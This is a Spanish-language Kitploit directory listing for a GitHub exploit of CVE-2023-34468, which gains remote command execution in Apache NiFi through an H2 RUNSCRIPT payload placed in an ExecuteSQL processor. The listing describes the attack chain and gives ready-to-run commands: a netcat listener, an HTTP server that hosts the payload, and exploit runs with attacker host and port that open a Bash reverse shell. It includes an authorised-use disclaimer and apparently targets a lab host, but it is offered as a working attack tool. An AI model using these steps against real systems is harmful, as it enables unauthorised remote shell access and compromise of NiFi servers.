Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Herramientas/GitHubGitHub/ozcanpng/cve-2023-34468
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Ver Repositorio
3hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-34468 — PoC de RCE mediante H2 RUNSCRIPT en ExecuteSQL de Apache NiFi

PoC corto en Python para abusar de un procesador ExecuteSQL editable de Apache NiFi con una carga útil RUNSCRIPT de H2 para desencadenar la ejecución remota de comandos a través de una reverse shell de Bash.

Solo para pruebas autorizadas e investigación. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.


Qué hace

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Detecta automáticamente un único procesador ExecuteSQL, o acepta --processor-id manualmente.
  2. Escribe una carga útil local rce.sql que define y llama a un alias de ejecución de shell respaldado por Java.
  3. Te pide que inicies tu propio listener nc y servidor HTTP.
  4. Actualiza la consulta del procesador para obtener rce.sql mediante H2 .
Descargar herramienta
RUNSCRIPT
  • Inicia el procesador para desencadenar la reverse shell.
  • Restaura la configuración original del procesador después de que confirmes que la shell ha llegado.

  • Capturas de pantalla

    1. Configuración

    Setup

    2. Solicitud a la carga útil

    Exploit run

    3. Shell recibida

    Processor update

    4. Resultado

    Result


    Instalación

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    Uso

    Terminal 1:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Terminal 2, desde el directorio de este repositorio:

    root@kitploit:~
    python3 -m http.server 8000
    

    Terminal 3:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    Para selección manual del procesador:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    Productos afectados

    ProductAffected VersionAccess RequiredImpact
    Apache NiFiImplementaciones afectadas por CVE-2023-34468 que usan el comportamiento editable de ExecuteSQL/H2Capacidad de alcanzar y modificar el procesador NiFi objetivo a través de la APIEjecución remota de comandos

    Notas

    • El script asume que la API de NiFi es accesible y que el usuario/sesión actual puede modificar el procesador objetivo.
    • El archivo rce.sql generado es ignorado por git y debe servirse desde el directorio del repositorio con python3 -m http.server.
    • Si la detección automática no encuentra ningún procesador o encuentra varios candidatos, pasa el UUID del procesador manualmente con --processor-id.
    • El script intenta restaurar la configuración original del procesador ExecuteSQL después de que confirmes que la shell ha llegado.

    Referencias

    • NVD — CVE-2023-34468
    • Apache NiFi
    • Comandos de la base de datos H2

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev